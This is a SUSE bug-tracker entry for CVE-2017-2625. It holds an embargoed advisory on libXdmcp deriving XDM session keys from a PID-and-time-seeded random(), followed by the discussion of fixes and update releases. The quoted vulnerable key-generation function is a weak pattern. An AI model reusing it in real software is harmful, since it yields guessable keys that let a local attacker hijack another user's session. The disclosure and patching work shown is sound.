Bug 1025046 (CVE-2017-2625)

Summary: VUL-0: CVE-2017-2625: libXdmcp: Weak entropy usage for session keys in libxdm
Product: [Novell Products] SUSE Security Incidents Reporter: Matthias Gerstner <matthias.gerstner>
Component: IncidentsAssignee: Security Team bot <security-team>
Status: RESOLVED FIXED QA Contact: Security Team bot <security-team>
Severity: Normal    
Priority: P3 - Medium CC: abergmann, krahmer, matthias.gerstner, meissner, sndirsch
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: Other   
Whiteboard: CVSSv2:SUSE:CVE-2017-2625:4.9:(AV:L/AC:L/Au:N/C:C/I:N/A:N) maint:released:sle10-sp3:63742
Found By: --- Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---
Bug Depends on:    
Bug Blocks: 1025639    
Attachments: X41-2017-001.txt

Description Matthias Gerstner 2017-02-13 16:32:48 UTC 
Embargoed until CRD 2017-02-28.

Received via private discussion on mailing list:

Summary and Impact
------------------

To further explore the auth mechanism libXdmcp-1.1.2 was checked
as well.

XDM uses weak entropy to generate the session keys on non BSD systems:

	void
	XdmcpGenerateKey (XdmAuthKeyPtr key)
	{
	#ifndef HAVE_ARC4RANDOM_BUF
	    long    lowbits, highbits;

	    srandom ((int)getpid() ^ time((Time_t *)0));
	    lowbits = random ();
	    highbits = random ();
	    getbits (lowbits, key->data);
	    getbits (highbits, key->data + 4);
	#else
	    arc4random_buf(key->data, 8);
	#endif
	}

On multi user systems it might possible to check
the PID of the process and how long it is running to get
an estimate of these values, which could allow an attacker
to attach to the session of a different user. Several
checked linux distributions (debian, archlinux and ubuntu)
did not link against libbsd at the time this was found.
Comment 1 Matthias Gerstner 2017-02-13 16:35:54 UTC 
Our codestreams don't even have that #else branch. Code is found in:

SUSE:SLE-10-SP3:Update/xorg-x11/xc/lib/Xdmcp/GenKey.c
SUSE:SLE-11:Update/xorg-x11-libXdmcp/libXdmcp-1.0.2/GenKey.c
SUSE:SLE-12:Update/libXdmcp/libXdmcp-1.1.1/Key.c

I guess we can consider all codestreams as affected.

There is no final patch available yet. In worst case we can read some sensible random data from /dev/?random.
Comment 2 Swamp Workflow Management 2017-02-13 23:01:53 UTC 
bugbot adjusting priority
Comment 4 Marcus Meissner 2017-02-28 14:55:55 UTC 
now public
Comment 5 Marcus Meissner 2017-02-28 14:56:45 UTC 
Created attachment 715739 [details]
X41-2017-001.txt

Weak entropy usage for session keys in libxdm
=============================================
Vulnerability Type: Other
Affected Products: libXdmcp
Attack Type: Local
Impact: Escalation of Privileges        
Severity Rating: medium
Confirmed Affected Version: 1.1.2 and lower
Confirmed Patched Version:
Vector: local
CVE: CVE-2017-2625
CVSS Score: 7.1
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N


Summary and Impact
------------------

To further explore the auth mechanism libXdmcp-1.1.2 was checked as well.

XDM uses weak entropy to generate the session keys on non BSD systems:

        void
        XdmcpGenerateKey (XdmAuthKeyPtr key)
        {
        #ifndef HAVE_ARC4RANDOM_BUF
            long    lowbits, highbits;
        
            srandom ((int)getpid() ^ time((Time_t *)0));
            lowbits = random ();
            highbits = random ();
            getbits (lowbits, key->data);
            getbits (highbits, key->data + 4);
        #else
            arc4random_buf(key->data, 8);
        #endif
        }

On multi user systems it might possible to check the PID of the process
and how long it is running to get an estimate of these values, which
could allow an attacker to attach to the session of a different user.
Several checked Linux distributions (debian testing, archlinux and
Ubuntu) did not link against libbsd at the time this was found.

Workaround
----------

Compile against libbsd
Comment 6 Stefan Dirsch 2017-05-18 12:35:01 UTC 
Seems the issue has meanwhile been addressed via git commits

0554324ec6bbc2071f5d1f8ad211a1643e29eb1f
6d1aee0310001eca8f6ded9814a2a70b3a774896

in libXdmcp.
Comment 7 Stefan Dirsch 2017-06-11 20:21:22 UTC 
getentropy() needs glibc 2.25, which is currently only provided by factory. Leap 42.2/42.3 doesn't fullfill this requirement, let alone sle12, sle11, sle10. 

arc4random_buf() needs libbsd. Do we really want to add this requirement for the Leap products (42.2/42.3)? On sle12, sle11, sle10 we apparently ship no libbsd.

Matthias? Marcus?
Comment 8 Stefan Dirsch 2017-06-11 20:32:17 UTC 
Factory done: SR#502911
Comment 9 Bernhard Wiedemann 2017-06-11 22:00:56 UTC 
This is an autogenerated message for OBS integration:
This bug (1025046) was mentioned in
https://build.opensuse.org/request/show/502911 Factory / libXdmcp
Comment 10 Marcus Meissner 2017-06-21 12:38:46 UTC 
matthias has a suggestion in the other bug. sorry for not having time earlier for this
Comment 11 Stefan Dirsch 2017-06-27 12:59:44 UTC 
Before adding replacements for getentropy() git commits

 6d1aee0310001eca8f6ded9814a2a70b3a774896
 0554324ec6bbc2071f5d1f8ad211a1643e29eb1f
 9f4cac7656b221ce2a8f97e7bd31e5e23126d001

needs to be added for Leap 42.2 and older.
Comment 12 Stefan Dirsch 2017-06-28 15:21:08 UTC 
fixed and submitrequested for Leap 42.2 and older (sle12, sle11 and sle10).
Comment 13 Stefan Dirsch 2017-06-28 15:22:24 UTC 
Sorry! Reopen.
Comment 14 Stefan Dirsch 2017-06-28 15:23:13 UTC 
Reassigning to security team instead!
Comment 15 Bernhard Wiedemann 2017-06-28 16:00:54 UTC 
This is an autogenerated message for OBS integration:
This bug (1025046) was mentioned in
https://build.opensuse.org/request/show/506829 42.2 / libXdmcp
Comment 17 Swamp Workflow Management 2017-07-01 08:29:03 UTC 
An update workflow for this issue was started.
This issue was rated as moderate.
Please submit fixed packages until 2017-07-17.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/63741
Comment 18 Swamp Workflow Management 2017-07-06 22:11:11 UTC 
openSUSE-SU-2017:1802-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1025046
CVE References: CVE-2017-2625
Sources used:
openSUSE Leap 42.2 (src):    libXdmcp-1.1.2-3.3.1
Comment 19 Marcus Meissner 2017-07-14 10:34:52 UTC 
*** Bug 815650 has been marked as a duplicate of this bug. ***
Comment 20 Swamp Workflow Management 2017-07-14 16:12:52 UTC 
SUSE-SU-2017:1862-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1025046
CVE References: CVE-2017-2625
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP2 (src):    libXdmcp-1.1.1-10.1
SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src):    libXdmcp-1.1.1-10.1
SUSE Linux Enterprise Server 12-SP2 (src):    libXdmcp-1.1.1-10.1
SUSE Linux Enterprise Desktop 12-SP2 (src):    libXdmcp-1.1.1-10.1
Comment 21 Swamp Workflow Management 2017-07-14 19:13:11 UTC 
SUSE-SU-2017:1868-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1025046
CVE References: CVE-2017-2625
Sources used:
SUSE Linux Enterprise Software Development Kit 11-SP4 (src):    xorg-x11-libXdmcp-7.4-3.1
SUSE Linux Enterprise Server 11-SP4 (src):    xorg-x11-libXdmcp-7.4-3.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    xorg-x11-libXdmcp-7.4-3.1
Comment 22 Marcus Meissner 2017-10-25 19:18:06 UTC 
released
Comment 23 Swamp Workflow Management 2018-02-01 17:11:06 UTC 
SUSE-SU-2018:0338-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1025046
CVE References: CVE-2017-2625
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP3 (src):    libXdmcp-1.1.1-12.1
SUSE Linux Enterprise Server 12-SP3 (src):    libXdmcp-1.1.1-12.1
SUSE Linux Enterprise Desktop 12-SP3 (src):    libXdmcp-1.1.1-12.1